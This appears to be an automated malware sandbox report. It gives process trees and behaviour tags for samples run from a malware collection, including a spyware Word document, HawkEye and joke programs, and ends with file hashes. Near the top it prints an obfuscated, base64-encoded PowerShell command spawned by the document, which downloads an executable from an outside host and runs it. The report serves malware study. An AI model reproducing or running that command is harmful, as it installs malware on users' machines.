C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\here\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Spyware\Kakwa.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:648
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C p^ow^Ers^HE^lL -e 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2⤵
- Process spawned unexpected child process
PID:3204
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowErsHElL -e WwBzAFkAUwBUAGUATQAuAFQARQB4AHQALgBFAE4AYwBvAGQASQBuAEcAXQA6ADoAVQBuAEkAYwBvAGQAZQAuAEcARQBUAHMAVAByAEkAbgBHACgAWwBTAHkAcwB0AGUATQAuAGMATwBuAFYAZQByAHQAXQA6ADoARgByAG8AbQBCAEEAUwBFADYANABzAHQAcgBpAE4ARwAoACIAZABBAEIAeQBBAEgAawBBAGUAdwBCAG0AQQBHADgAQQBjAGcAQQBnAEEAQwBnAEEASgBBAEIAcABBAEQAMABBAE0AUQBBADcAQQBDAEEAQQBKAEEAQgBwAEEAQwBBAEEATABRAEIAcwBBAEcAVQBBAEkAQQBBAHgAQQBEAEEAQQBPAHcAQQBnAEEAQwBRAEEAYQBRAEEAcgBBAEMAcwBBAEsAUQBBAGcAQQBIAHMAQQBKAEEAQgBwAEEAQwB3AEEASQBnAEIAZwBBAEcANABBAEkAZwBCADkAQQBIADAAQQBZAHcAQgBoAEEASABRAEEAWQB3AEIAbwBBAEgAcwBBAGYAUQBBAGcAQQBHAFkAQQBkAFEAQgB1AEEARwBNAEEAZABBAEIAcABBAEcAOABBAGIAZwBBAGcAQQBIAGsAQQBaAFEAQgB0AEEARwBRAEEAYQBnAEEAZwBBAEMAZwBBAEkAQQBBAGsAQQBIAFUAQQBZAFEAQgAyAEEASABVAEEASQBBAEEAcwBBAEMAQQBBAEoAQQBCAHcAQQBIAFkAQQBhAEEAQgBuAEEAQwBBAEEASwBRAEEATgBBAEEAbwBBAGUAdwBCAHAAQQBFADAAQQBjAEEAQgB2AEEARgBJAEEAZABBAEEAdABBAEUAMABBAFQAdwBCAEUAQQBGAFUAQQBUAEEAQgBsAEEAQwBBAEEAUQBnAEIASgBBAEgAUQBBAGMAdwBCAFUAQQBIAEkAQQBRAFEAQgB1AEEARgBNAEEAUgBnAEIAbABBAEgASQBBAE8AdwBBAE4AQQBBAG8AQQBjAHcAQgAwAEEARwBFAEEAVQBnAEIAMABBAEMAMABBAFkAZwBCAHAAQQBIAFEAQQBVAHcAQgBVAEEASABJAEEAUQBRAEIATwBBAEYATQBBAFIAZwBCAGwAQQBGAEkAQQBJAEEAQQB0AEEASABNAEEAVAB3AEIAMQBBAEYASQBBAFkAdwBCAEYAQQBDAEEAQQBKAEEAQgAxAEEARwBFAEEAZABnAEIAMQBBAEMAQQBBAEwAUQBCAGsAQQBFAFUAQQBjAHcAQgBVAEEARwBrAEEAVABnAEIAaABBAEgAUQBBAFMAUQBCAHYAQQBHADQAQQBJAEEAQQBrAEEASABBAEEAZABnAEIAbwBBAEcAYwBBAE8AdwBBAGcAQQBDAFkAQQBJAEEAQQBrAEEASABBAEEAZABnAEIAbwBBAEcAYwBBAE8AdwBCADkAQQBBADAAQQBDAGcAQgAwAEEASABJAEEAZQBRAEIANwBBAEMAUQBBAFoAQQBCADQAQQBIAG8AQQBaAGcAQgA0AEEASABNAEEAYgBnAEIAcQBBAEgAZwBBAFAAUQBCAGIAQQBFAFUAQQBUAGcAQgAyAEEARQBrAEEAVQBnAEIAdgBBAEUANABBAGIAUQBCAEYAQQBHADQAQQBkAEEAQgBkAEEARABvAEEATwBnAEIAbgBBAEUAVQBBAGQAQQBCAEcAQQBHADgAQQBUAEEAQgBFAEEARQBVAEEAYwBnAEIAUQBBAEUARQBBAFYAQQBCAG8AQQBDAGcAQQBKAHcAQgBOAEEARgBrAEEAUgBBAEIAUABBAEcATQBBAFYAUQBCAE4AQQBHAFUAQQBUAGcAQgBVAEEASABNAEEASgB3AEEAcABBAEMAcwBBAEoAdwBCAGMAQQBIAFUAQQBhAGcAQgBvAEEAR
wA0AEEAWQB3AEIAcgBBAEcARQBBAGEAdwBCADMAQQBHAEUAQQBMAGcAQgBsAEEASABnAEEAWgBRAEEAbgBBAEQAcwBBAEQAUQBBAEsAQQBIAGsAQQBaAFEAQgB0AEEARwBRAEEAYQBnAEEAZwBBAEMAYwBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAMABBAFoAUQBCAG4AQQBHAEUAQQBZAGcAQgA1AEEASABRAEEAWgBRAEIAdABBAEcARQBBAGIAZwBCADAAQQBHADgAQQBiAFEAQQB1AEEARwBNAEEAYgB3AEIAdABBAEMAOABBAGIAQQBCADEAQQBHAE0AQQBhAHcAQQB2AEEASABJAEEAWgBRAEIAdABBAEgASQBBAFkAUQBCAGgAQQBIAFEAQQBMAGcAQgBsAEEASABnAEEAWgBRAEEAbgBBAEMAQQBBAEoAQQBCAGsAQQBIAGcAQQBlAGcAQgBtAEEASABnAEEAYwB3AEIAdQBBAEcAbwBBAGUAQQBBADcAQQBBADAAQQBDAGcAQQBrAEEARwA0AEEAYQBnAEIAbgBBAEgARQBBAGUAZwBCAHkAQQBEADAAQQBXAHcAQgBGAEEARwA0AEEAZABnAEIAcABBAEgASQBBAFQAdwBCAHUAQQBFADAAQQBaAFEAQgBPAEEASABRAEEAWABRAEEANgBBAEQAbwBBAFoAdwBCAEYAQQBIAFEAQQBaAGcAQgBQAEEARwB3AEEAWgBBAEIAbABBAEYASQBBAGMAQQBCAEIAQQBIAFEAQQBTAEEAQQBvAEEAQwBjAEEAVABRAEIAWgBBAEgAQQBBAGEAUQBCAEQAQQBGAFEAQQBWAFEAQgB5AEEARQBVAEEAVQB3AEEAbgBBAEMAawBBAEsAdwBBAG4AQQBGAHcAQQBhAEEAQgBoAEEARwBvAEEAWQBRAEIAQQBBAEcARQBBAGMAdwBCAG8AQQBHAEUAQQBhAEEAQgBoAEEASABNAEEATABnAEIAbABBAEgAZwBBAFoAUQBBAG4AQQBEAHMAQQBEAFEAQQBLAEEASABrAEEAWgBRAEIAdABBAEcAUQBBAGEAZwBBAGcAQQBDAGMAQQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADAAQQBaAFEAQgBuAEEARwBFAEEAWQBnAEIANQBBAEgAUQBBAFoAUQBCAHQAQQBHAEUAQQBiAGcAQgAwAEEARwA4AEEAYgBRAEEAdQBBAEcATQBBAGIAdwBCAHQAQQBDADgAQQBiAEEAQgAxAEEARwBNAEEAYQB3AEEAdgBBAEgAQQBBAFkAUQBCAHkAQQBHAEUAQQBZAFEAQgAwAEEAQwA0AEEAWgBRAEIANABBAEcAVQBBAEoAdwBBAGcAQQBDAFEAQQBiAGcAQgBxAEEARwBjAEEAYwBRAEIANgBBAEgASQBBAE8AdwBBAE4AQQBBAG8AQQBmAFEAQgBqAEEARwBFAEEAZABBAEIAagBBAEcAZwBBAGUAdwBCADkAQQBBAD0APQAiACkAKQB8AEkARQBYAA==3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4180
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 648 -s 44362⤵
- Process spawned unexpected child process
- Program crash
PID:2160
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 444 -p 648 -ip 6481⤵PID:1256
C:\Users\Admin\Downloads\here\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Spyware\butterflyondesktop.exe"C:\Users\Admin\Downloads\here\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Spyware\butterflyondesktop.exe"1⤵
- Executes dropped EXE
PID:4036
C:\Users\Admin\AppData\Local\Temp\is-29H8C.tmp\butterflyondesktop.tmp"C:\Users\Admin\AppData\Local\Temp\is-29H8C.tmp\butterflyondesktop.tmp" /SL5="$C04AC,2719719,54272,C:\Users\Admin\Downloads\here\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Spyware\butterflyondesktop.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4592
C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"C:\Program Files (x86)\Butterfly on Desktop\ButterflyOnDesktop.exe"3⤵
- Chimera
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in Program Files directory
PID:4188
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://freedesktopsoft.com/butterflyondesktoplike.html3⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:2388
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffe56dd46f8,0x7ffe56dd4708,0x7ffe56dd47184⤵PID:244
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,10766173005729002555,8675478827934598867,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:24⤵PID:2988
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,10766173005729002555,8675478827934598867,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2916 /prefetch:84⤵PID:3484
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,10766173005729002555,8675478827934598867,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:34⤵PID:4584
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10766173005729002555,8675478827934598867,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:14⤵PID:3344
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10766173005729002555,8675478827934598867,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:14⤵PID:2204
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,10766173005729002555,8675478827934598867,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:14⤵PID:624
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4052
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:736
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\here\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Spyware\The Worst Of All!!!!!!\BonziBUDDY!!!!!!.txt1⤵PID:3032
C:\Users\Admin\Downloads\here\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Spyware\HawkEye.exe"C:\Users\Admin\Downloads\here\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Spyware\HawkEye.exe"1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4744
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:4736
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\YOUR_FILES_ARE_ENCRYPTED.HTML1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:4600
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffe56dd46f8,0x7ffe56dd4708,0x7ffe56dd47182⤵PID:1364
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,13062579258491689816,10811440351494910133,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:32⤵PID:3692
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,13062579258491689816,10811440351494910133,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:22⤵PID:3580
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,13062579258491689816,10811440351494910133,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2848 /prefetch:82⤵PID:2476
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,13062579258491689816,10811440351494910133,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:12⤵PID:1816
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,13062579258491689816,10811440351494910133,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:12⤵PID:2088
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,13062579258491689816,10811440351494910133,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5132 /prefetch:82⤵PID:3492
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2088,13062579258491689816,10811440351494910133,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5132 /prefetch:82⤵PID:4468
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,13062579258491689816,10811440351494910133,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:12⤵PID:4244
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,13062579258491689816,10811440351494910133,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5412 /prefetch:12⤵PID:1492
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,13062579258491689816,10811440351494910133,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:12⤵PID:1144
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2088,13062579258491689816,10811440351494910133,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5404 /prefetch:12⤵PID:4072
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2092
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4540
C:\Users\Admin\Downloads\here\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Joke\rickroll.exe"C:\Users\Admin\Downloads\here\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Joke\rickroll.exe"1⤵
- Executes dropped EXE
PID:4084
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:3892
C:\Users\Admin\Downloads\here\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Joke\rickroll.exe"C:\Users\Admin\Downloads\here\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Joke\rickroll.exe"1⤵
- Executes dropped EXE
PID:2944
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:3484
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe56dd46f8,0x7ffe56dd4708,0x7ffe56dd47182⤵PID:4256
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,1091016586077059364,11548611805364664962,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:22⤵PID:2188
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,1091016586077059364,11548611805364664962,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 /prefetch:32⤵PID:4276
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2152,1091016586077059364,11548611805364664962,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2940 /prefetch:82⤵PID:1680
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,1091016586077059364,11548611805364664962,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:12⤵PID:2860
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,1091016586077059364,11548611805364664962,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:12⤵PID:3948
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,1091016586077059364,11548611805364664962,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4316 /prefetch:12⤵PID:1436
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,1091016586077059364,11548611805364664962,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:12⤵PID:4604
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:464
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4200
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
PID:684
C:\Users\Admin\Downloads\here\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Joke\YouAreAnIdiot\EXEVersion\YouAreAnIdiot.exe"C:\Users\Admin\Downloads\here\The-MALWARE-Repo-master\The-MALWARE-Repo-master\Joke\YouAreAnIdiot\EXEVersion\YouAreAnIdiot.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4384
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
6KB
MD5aa44b7e2023d2c525e700804bca098da
SHA1d81aaf1c947f8a10fa3e97724c230d5401f6421a
SHA256dd06d4b01fbea1ba68a777ab56d16fdf6553d63cba3f212fb5387a2dd93da19e
SHA512dc1522386c266f943fd3bc47ba1ddc98523285808b61a66902cd64562b085185cdc3a7541f21f92d7b08c28a59fd19e0548cb366229d094f4d82d645002d7479
-
Filesize
6KB
MD57f8d4656b57444673b1e237afe947e8e
SHA1dee5f9f0ffb57238e22821167c0017f76fa0e0c5
SHA2567c5e430497f667208d41cb61e4af3a8fb90f83d60a2f3e709cdb6bdb6d02f9df
SHA5124245a12117ede5bd63b7ddbec32481ead03bf182a5f63efd6728a672bcf5c01a39af954558e02a968067f9d3de273ca048e89ef0ceedd27d7d2b03bc0e7165d0
-
Filesize
8KB
MD537cc931238e2ed0eddb340d77f2ac875
SHA1de0827ac9be14f281935ac9b0d62df4d545ccae7
SHA25682306bc73956f0da1858e5556270bee5d6585b107c9cba4eb245d17527052072
SHA51249ee796afb565ff45f2778e1716c2fed8c8a1e8b5367d5b7d01c359a095efdc14cacdf39bdc5c78a1e9bebdfbc2d8830fdc880cd50e2e904fb0883652b4e5f8f
-
Filesize
11KB
MD55022af8a4b868b1c80f42fd8a2576d49
SHA1f47b7cb092ad3524097c399328d90a171f51e572
SHA25605bf1dd62b147f8649bc4f56a3e370d8cef09b09cae01bd293bb0eea2ad4b925
SHA512afbe2e8c65369864a7dfc9627ece15433627e5874c2a4834921a3c86daf4f034960c33f41490bc01545dad2460bb162bd8f69a5c73f230a25172503ce59294f3
-
Filesize
9KB
MD5d12e78db3fca2fe7782752e517f868a4
SHA1b6ccfa5706abf697e1bd985eebd0913dd601672e
SHA2568ace1756af00bab75e9a1aa70b3f21ead76192cf57d20443b3a17426951f5784
SHA512e221b5aa769f1f8a5a03e9d6fa528ed4c1762a2ce976b237e18b0cd1d3d3d955fa31024bf531043aa51a626c4eec8d122c9da666d99a099a07e37ef62b8e743b
-
Filesize
9KB
MD5d12e78db3fca2fe7782752e517f868a4
SHA1b6ccfa5706abf697e1bd985eebd0913dd601672e
SHA2568ace1756af00bab75e9a1aa70b3f21ead76192cf57d20443b3a17426951f5784
SHA512e221b5aa769f1f8a5a03e9d6fa528ed4c1762a2ce976b237e18b0cd1d3d3d955fa31024bf531043aa51a626c4eec8d122c9da666d99a099a07e37ef62b8e743b
-
Filesize
24KB
MD50ea195b890a87594deb9c6aa963c1426
SHA14065f3fe0b70940a968f2ca342bac336be048082
SHA256c51961b927f80537702a7ff5f77501c1e088cbfcc22199675400ea88876f4ef9
SHA51259ae3e1e530b5c081089ee615fb5d227a1964068bcda421de1319e958438353bbed8ca275897deb097a564a6a60400e1faf6c3e1aa5764d1fbba15bdc1d9ddf5
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
Filesize72B
MD59b155efde3388349839acb654302e0f5
SHA1295f0b6713d108896785ddc1f48ef7976d177c4f
SHA25626194a9f4f9ca987d4f2bc0079ba9392461d8b2734c6bfc0e867c554629b35f3
SHA512dc763a4603c136cc841d5172d595280b4bee6e7beaa731889a6d85aedf2c3af6d95f2da3aec39a7d76f2fdbd3d573ac9f43691c8b25fae48ff23608ae25ba081
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5b1cfa.TMP
Filesize48B
MD5765a292e9373fba32ab1bd57930ce44d
SHA17c689c51a7e262d80496df3fbaaa308f820ee24a
SHA2565d35a841e7a518d598bdad83e79f46dff2e8c1dd1239bdf86c6fa9be1720b2bf
SHA5127ab41628e2a4f9bef04bc335a48ae0bdada91ef60491dbe268431d2709174075fa17c06a3fe11f439e94e8e2ac91ff7442a3aa46676cda68874f695f161bec85
-
Filesize
1KB
MD5b0b5d5a89a0b34b367e8eb95d2f728c0
SHA100204ee1903fbdae4a6772c45d334363886bbcb9
